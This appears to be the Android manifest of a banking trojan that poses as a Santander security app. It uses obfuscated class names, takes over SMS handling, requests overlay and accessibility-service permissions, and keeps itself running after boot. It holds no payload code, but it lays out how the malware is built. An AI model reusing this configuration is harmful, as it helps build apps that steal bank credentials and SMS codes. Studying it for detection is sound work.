<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" xmlns:app="http://schemas.android.com/apk/res-auto" android:versionCode="1" android:versionName="1.0" android:compileSdkVersion="23" android:compileSdkVersionCodename="6.0-2438415" package="wocwvy.czyxoxmbauu.slsa" platformBuildVersionCode="23" platformBuildVersionName="6.0-2438415">
    <uses-sdk android:minSdkVersion="15" android:targetSdkVersion="27"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.GET_TASKS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.WRITE_SMS"/>
    <uses-permission android:name="android.permission.PACKAGE_USAGE_STATS"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.CALL_PHONE"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
    <application android:theme="@style/Theme.Translucent.NoTitleBar" android:label="Blindaje Santander Super Movil" android:icon="@mipmap/ic_launcher" android:name="wocwvy.czyxoxmbauu.slsa.rihynmfwilxiqz" android:allowBackup="true" android:supportsRtl="true">
        <activity android:theme="@style/Theme.Translucent.NoTitleBar" android:name="com.google.android.gms.common.api.GoogleApiActivity" android:exported="false"/>
        <meta-data android:name="com.google.android.gms.version" android:value="12211000"/>
        <meta-data android:name="android.support.VERSION" android:value="26.1.0"/>
        <meta-data android:name="android.arch.lifecycle.VERSION" android:value="27.0.0-SNAPSHOT"/>
        <activity android:name="wocwvy.czyxoxmbauu.slsa.ncec.myvbo">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <receiver android:name="wocwvy.czyxoxmbauu.slsa.pworotsvjdlioho.cmtstflxlxb" android:permission="android.permission.BROADCAST_SMS">
            <intent-filter>
                <action android:name="android.provider.Telephony.SMS_DELIVER"/>
            </intent-filter>
        </receiver>
        <receiver android:name="wocwvy.czyxoxmbauu.slsa.pworotsvjdlioho.qpgopfninoaazln" android:permission="android.permission.BROADCAST_WAP_PUSH" android:enabled="true">
            <intent-filter>
                <action android:name="android.provider.Telephony.WAP_PUSH_DELIVER"/>
                <data android:mimeType="application/vnd.wap.mms-message"/>
            </intent-filter>
        </receiver>
        <activity android:name="wocwvy.czyxoxmbauu.slsa.opzsdswiddt">
            <intent-filter>
                <action android:name="android.intent.action.SEND"/>
                <action android:name="android.intent.action.SENDTO"/>
                <data android:scheme="sms"/>
                <data android:scheme="smsto"/>
                <data android:scheme="mms"/>
                <data android:scheme="mmsto"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.BROWSABLE"/>
            </intent-filter>
        </activity>
        <service android:name="wocwvy.czyxoxmbauu.slsa.lmimy" android:permission="android.permission.SEND_RESPOND_VIA_MESSAGE" android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.RESPOND_VIA_MESSAGE"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <data android:scheme="sms"/>
                <data android:scheme="smsto"/>
                <data android:scheme="mms"/>
                <data android:scheme="mmsto"/>
            </intent-filter>
        </service>
        <service android:name="wocwvy.czyxoxmbauu.slsa.wfveenegvz" android:enabled="true" android:exported="true"/>
        <service android:name="wocwvy.czyxoxmbauu.slsa.frvvkgp" android:enabled="true" android:exported="true"/>
        <receiver android:name="wocwvy.czyxoxmbauu.slsa.pworotsvjdlioho.hypihteeavv">
            <intent-filter android:priority="999">
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <action android:name="android.intent.action.QUICKBOOT_POWERON"/>
                <action android:name="com.htc.intent.action.QUICKBOOT_POWERON"/>
                <action android:name="android.intent.action.USER_PRESENT"/>
                <action android:name="android.intent.action.PACKAGE_ADDED"/>
                <action android:name="android.intent.action.PACKAGE_REMOVED"/>
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
                <action android:name="android.intent.action.SCREEN_ON"/>
                <action android:name="android.intent.action.EXTERNAL_APPLICATIONS_AVAILABLE"/>
                <category android:name="android.intent.category.HOME"/>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
                <action android:name="android.net.wifi.WIFI_STATE_CHANGED"/>
                <action android:name="android.intent.action.DREAMING_STOPPED"/>
            </intent-filter>
        </receiver>
        <activity android:theme="@style/Theme.NoDisplay" android:icon="@drawable/im" android:name="wocwvy.czyxoxmbauu.slsa.ncec.sxfl" android:excludeFromRecents="true"/>
        <activity android:label="" android:icon="@drawable/im" android:name="wocwvy.czyxoxmbauu.slsa.oyqwzkyy.qvhy.cwwzcpcu"/>
        <activity android:label="" android:icon="@drawable/im" android:name="wocwvy.czyxoxmbauu.slsa.ncec.pltrfi" android:excludeFromRecents="true" android:launchMode="singleTask"/>
        <activity android:label="" android:name="wocwvy.czyxoxmbauu.slsa.ncec.wami" android:excludeFromRecents="true" android:launchMode="singleTask"/>
        <activity android:label="" android:icon="@drawable/im" android:name="wocwvy.czyxoxmbauu.slsa.ncec.fyqapyahei" android:launchMode="singleTask"/>
        <activity android:label="" android:icon="@drawable/im" android:name="wocwvy.czyxoxmbauu.slsa.ncec.bdxyqqt" android:excludeFromRecents="true" android:launchMode="singleTask"/>
        <activity android:label="" android:icon="@drawable/im" android:name="wocwvy.czyxoxmbauu.slsa.ncec.dzudmx"/>
        <activity android:label="" android:name="wocwvy.czyxoxmbauu.slsa.ncec.gcmysyhtova" android:excludeFromRecents="true" android:launchMode="singleTask"/>
        <activity android:label="" android:icon="@drawable/im" android:name="wocwvy.czyxoxmbauu.slsa.ncec.ozkgyjpxtyxajmm" android:excludeFromRecents="true" android:launchMode="singleTask"/>
        <activity android:label="" android:icon="@drawable/im" android:name="wocwvy.czyxoxmbauu.slsa.ncec.khypzruy" android:excludeFromRecents="true" android:launchMode="singleTask"/>
        <receiver android:name="wocwvy.czyxoxmbauu.slsa.pworotsvjdlioho.hwfe" android:enabled="true" android:exported="false"/>
        <service android:name="wocwvy.czyxoxmbauu.slsa.ukhakhcgifofl" android:exported="false"/>
        <service android:name="wocwvy.czyxoxmbauu.slsa.jtfxlnc" android:enabled="true" android:exported="true"/>
        <service android:name="wocwvy.czyxoxmbauu.slsa.blkzyyyfc" android:enabled="true" android:exported="true"/>
        <service android:name="wocwvy.czyxoxmbauu.slsa.whemsbk" android:exported="false"/>
        <service android:name="wocwvy.czyxoxmbauu.slsa.nepgaqmyfrhw" android:exported="false"/>
        <service android:name="wocwvy.czyxoxmbauu.slsa.clgqtzqdh" android:enabled="true" android:exported="true"/>
        <service android:name="wocwvy.czyxoxmbauu.slsa.usbvhkriufnc" android:enabled="true" android:exported="true"/>
        <service android:label="Santander Security" android:name="wocwvy.czyxoxmbauu.slsa.egxltnv" android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService"/>
            </intent-filter>
            <meta-data android:name="android.accessibilityservice" android:resource="@xml/mihaf"/>
        </service>
        <service android:name="wocwvy.czyxoxmbauu.slsa.kldqwysgkfcrmq" android:exported="false"/>
        <service android:name="wocwvy.czyxoxmbauu.slsa.oyqwzkyy.qvhy.jkeggfql" android:exported="true"/>
        <service android:name="wocwvy.czyxoxmbauu.slsa.oyqwzkyy.qvhy.nvsdtnxkzjgw" android:exported="false"/>
        <service android:name="wocwvy.czyxoxmbauu.slsa.oyqwzkyy.hzgktdtr.brtltydqhiuqbb" android:exported="false"/>
        <service android:name="wocwvy.czyxoxmbauu.slsa.xelytgswelv" android:exported="false"/>
        <service android:name="wocwvy.czyxoxmbauu.slsa.mvqkjokaxfrpf" android:exported="false"/>
        <service android:name="wocwvy.czyxoxmbauu.slsa.wahiuolww" android:exported="false"/>
        <activity android:label="" android:icon="@drawable/im" android:name="wocwvy.czyxoxmbauu.slsa.ncec.kcdbt"/>
        <service android:name="wocwvy.czyxoxmbauu.slsa.oyqwzkyy.hzgktdtr.cpysnikhf" android:exported="false"/>
        <activity android:label="" android:icon="@drawable/im" android:name="wocwvy.czyxoxmbauu.slsa.ncec.fymeshs"/>
        <activity android:label="" android:icon="@drawable/im" android:name="wocwvy.czyxoxmbauu.slsa.ncec.ovyvpsbxxrtayd"/>
        <service android:name="wocwvy.czyxoxmbauu.slsa.oyqwzkyy.dxivifswvkcvwz.wifu" android:exported="false"/>
        <service android:name="wocwvy.czyxoxmbauu.slsa.oyqwzkyy.dxivifswvkcvwz.dshd" android:enabled="true" android:exported="true"/>
        <service android:name="wocwvy.czyxoxmbauu.slsa.kuv.sfswwunyakpjr" android:exported="false"/>
        <activity android:label="" android:icon="@drawable/im" android:name="wocwvy.czyxoxmbauu.slsa.ncec.zjwruw"/>
        <service android:name="wocwvy.czyxoxmbauu.slsa.ttiegryczsx" android:exported="false"/>
        <service android:name="wocwvy.czyxoxmbauu.slsa.blyvffs"/>
    </application>
</manifest>
